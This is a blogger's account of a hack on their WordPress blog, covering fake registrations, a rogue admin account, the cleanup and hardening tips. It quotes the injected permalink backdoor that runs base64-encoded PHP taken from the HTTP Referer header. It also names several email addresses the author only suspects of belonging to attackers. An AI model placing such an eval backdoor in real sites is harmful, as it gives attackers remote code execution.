During the past few days there has been quite a few hacker attacks on WordPress powered blogs.
One of my blogs was targeted and successfully hacked.
Prior to the hack occurring I noticed a few new accounts had been created by people with strange names using gmail addresses. This made me a little suspicious as the blogs do not actively encourage registrations. As a result of this I wrote this draft:
Over the past few days a number of new registrations have occurred on two of my blogs. The number hasn’t been great, maybe two a day on each blog.
You may think this is a good thing as it helps build community and shows people are interested in learning more about the blog, and this would be true if the blogs were encouraging people to become members, but they are not.
Both of the blogs concerned have been created using WordPress, and even though the registration page is not linked to from the blog, it is not difficult to guess where it is located for most WordPress installations (http://www.mydomain.com/wp-registration.php). What makes the activity of registering even more suspicious is the use of names and email addresses that make no sense and the use of Gmail in each case.
Whenever I am unsure about something I always turn to Google to see what it has to say. I did this for each of the email address used in the registrations. Here are some of those email addresses and a link to Google’s search results:
alexsannd@mail.ru (Google search results)
k.ergearo.rearf@gmail.com (Google search results)
pulvillarrac@gmail.com (Google search results)
obierebelominepyb@gmail.com (Google did not return any results for this address)
bugbeemershonyhe@gmail.com (Google search results)If you have looked at some of the search results you have probably come to the same SPAMMER/HACKER conclusion as me. If the people who have registered are legitimate, I apologize, but I sincerely doubt they are people genuinely interested in getting involved with the development of my blogs. I think they are people looking for a way into the backend of my blogs in order to cause some damage.
So what can be done to stop this happening?
Firstly, if you run your WordPress blog on your own and you are happy to continue doing so, you must switch off the ‘Anyone can register’ feature. This is done by default, but it may have been enabled at some point and never disabled.
If you do allow people to register you can set the default role to ’subscriber’ until the registration has been verified. Once you have checked the registration you can upgrade the users role to Contributor, Author or whatever you choose.
You could install your WordPress core files in a different directory, but I am not convinced this would be that successful in stopping fake registrations, but it is worth considering.
Add the Audit Trail plugin so you can see what is happening on your blog.
That what as far as I got. When I logged on the next day I noticed Photobomb had been hacked. A new admin user had been created (only visible through phpMyAdmin and not the WordPress dashboard) and the permalink structure had been changed to include this:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
A search on Google returned several results including a this thread on the WordPress forums; it was clear some muppet had hacked into the site and taken advantage of my lackadaisical approach to updating the core files to 2.8.4 – and the attack seemed to be quite widespread.
The fix was easy – upgrade to 2.8.4 (after first backing up the database and downloading the whole site), change the permalink structure back to its original state (which, incidentally, had been changed from the default setting of ‘year/month/post-title’ to ‘year/month/DAY/post-title’) and login to the MySQL database and delete the newly created admin user. As far as I could tell this has fixed the hack.
I can’t be sure the new registrations and subsequent attack where linked, but it seems too much of a coincidence for them not to be. The admin user was created with the username FrankGunning77, but I didn’t make a note of the email address. There are a lot of people called Frank Gunning, but I doubt the real Frank Gunning is the man behind the hack attack.
Today, on a dormant blog running an old version of WordPress, another user has been created, this time with the email address ulrichedmondsuses@gmail.com and username UlricheDmond. This is obviously fake and the user has been deleted and the blog updated.
So, if you are running a WordPress blog and the version is not 2.8.4 you really should update it if you want to reduce the risk of it being hacked. It seems the prowlers have not stopped and are still looking for lazy bloggers to exploit.
Further reading on this hack and WordPress security issues:
Lorelle – Old WordPress Versions Under Attack
WordPress Spam Hack Alert
WordPress forum thread – eval(base64_decode(…)) in permalinks
WordPress Hacked – eval base64_decode _SERVER[HTTP_REFERER]
WordPress Security Tips and Hacks
UPDATE
After this post was published I had a quick search for a plugin which stops registrations from the generic email addresses most often used by spammers and hackers – Gmail, Hotmail etc. I found one called No Disposable Email. It is working with WordPress 2.8.4 and has an editable list of domains you don’t want users to register with. Gmail is not in the default list, but it is easy to add.
